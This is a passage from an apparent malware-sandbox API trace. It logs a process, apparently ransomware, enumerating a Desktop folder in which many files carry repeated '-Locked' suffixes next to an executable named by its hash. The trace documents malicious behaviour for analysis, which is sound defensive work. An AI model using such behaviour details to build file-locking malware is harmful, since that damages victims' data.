ftLastAccessTime.dwLowDateTime=0x329021a3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329021a3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked", cAlternateFileName="WJV4VO~2.GIF")) returned 1 [0305.261] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3647dc3b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3647dc3b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3647dc3b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked-Locked", cAlternateFileName="WJV4VO~1.GIF")) returned 1 [0305.262] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32913273, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32913273, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32913273, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 1 [0305.262] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36485145, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked-Locked", cAlternateFileName="Y4HQQH~1.PDF")) returned 1 [0305.262] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0305.262] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0305.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0305.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0305.263] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0305.263] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0305.263] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.263] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.264] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x346f313f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x346f313f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x346f313f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked-Locked", cAlternateFileName="0AIH45~1.JPG")) returned 1 [0305.264] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35eba5f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35eba5f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35eba5f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked-Locked-Locked", cAlternateFileName="0AIH45~2.JPG")) returned 1 [0305.264] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34724090, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34724090, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34724090, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked-Locked", cAlternateFileName="4-0BKI~2.MKV")) returned 1 [0305.265] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35f01333, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35f01333, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35f01333, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked", cAlternateFileName="4-0BKI~1.MKV")) returned 1 [0305.265] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0305.265] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327920f7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327920f7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35f1993c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", cAlternateFileName="69811A~2.EXE")) returned 1 [0305.265] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35f72b69, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35f72b69, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35f72b69, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked", cAlternateFileName="69811A~3.EXE")) returned 1 [0305.266] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a0a8d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a0a8d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a0a8d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked", cAlternateFileName="AUTORU~1.INF")) returned 1 [0305.266] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fa387f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35fa387f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35fa387f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked-Locked", cAlternateFileName="AUTORU~2.INF")) returned 1 [0305.266] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x32993524, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32993524, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0305.266] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x326a0563, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x326a0563, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x326a0563, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked", cAlternateFileName="BGQH9X~2")) returned 1 [0305.267] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fd6d70, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35fd6d70, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35fd6d70, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked-Locked", cAlternateFileName="BGQH9X~3")) returned 1 [0305.267] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a9438, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a9438, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a9438, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked", cAlternateFileName="CSI0AP~2.DOC")) returned 1 [0305.267] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3602eacf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3602eacf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3602eacf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked-Locked", cAlternateFileName="CSI0AP~1.DOC")) returned 1 [0305.268] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327b56d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327b56d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327b56d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked", cAlternateFileName="CX4AG~1.DOC")) returned 1 [0305.268] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3608b7bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3608b7bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3608b7bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked-Locked", cAlternateFileName="CX4AG~2.DOC")) returned 1 [0305.268] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327c40db, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327c40db, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327c40db, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked", cAlternateFileName="D-A24D~2.XLS")) returned 1 [0305.268] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360ab2d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360ab2d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360ab2d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked-Locked", cAlternateFileName="D-A24D~1.XLS")) returned 1 [0305.269] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327d17bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327d17bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327d17bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.269] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360bd8ae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360bd8ae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360bd8ae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked", cAlternateFileName="DESKTO~2.INI")) returned 1 [0305.269] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327effc0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327effc0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327effc0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked", cAlternateFileName="G2JIFN~2.WAV")) returned 1 [0305.270] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360d10bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360d10bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360d10bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked-Locked", cAlternateFileName="G2JIFN~1.WAV")) returned 1 [0305.270] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327fc3a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327fc3a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327fc3a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked", cAlternateFileName="HAXUSM~2.PNG")) returned 1 [0305.270] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36130501, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36130501, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36130501, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked-Locked", cAlternateFileName="HAXUSM~1.PNG")) returned 1 [0305.271] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3280deae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3280deae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3280deae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked", cAlternateFileName="HELJNZ~1.BMP")) returned 1 [0305.271] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361946b9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x361946b9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x361946b9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked-Locked", cAlternateFileName="HELJNZ~2.BMP")) returned 1 [0305.271] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32818f84, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32818f84, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32818f84, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked", cAlternateFileName="HHODZG~2.AVI")) returned 1 [0305.271] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3628d5d5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3628d5d5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3628d5d5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked-Locked", cAlternateFileName="HHODZG~1.AVI")) returned 1 [0305.272] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32825171, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32825171, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32825171, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked", cAlternateFileName="IWYHBO~2.AVI")) returned 1 [0305.272] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362af9e1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x362af9e1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x362af9e1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked", cAlternateFileName="IWYHBO~1.AVI")) returned 1 [0305.275] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32830233, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32830233, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32830233, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked", cAlternateFileName="IZRQFJ~1.M4A")) returned 1 [0305.276] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362cf450, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x362cf450, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x362cf450, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked-Locked", cAlternateFileName="IZRQFJ~2.M4A")) returned 1 [0305.276] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32841392, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32841392, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32841392, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked", cAlternateFileName="L0CW~2.DOC")) returned 1 [0305.276] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3630777f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3630777f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3630777f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked-Locked", cAlternateFileName="L0CW~1.DOC")) returned 1 [0305.276] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3284eac3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3284eac3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3284eac3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked", cAlternateFileName="L3CXAN~2.MKV")) returned 1 [0305.277] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364167a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364167a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364167a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked-Locked", cAlternateFileName="L3CXAN~1.MKV")) returned 1 [0305.277] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3285ad2f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3285ad2f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3285ad2f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked", cAlternateFileName="L_WFYU~2.PPT")) returned 1 [0305.277] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, 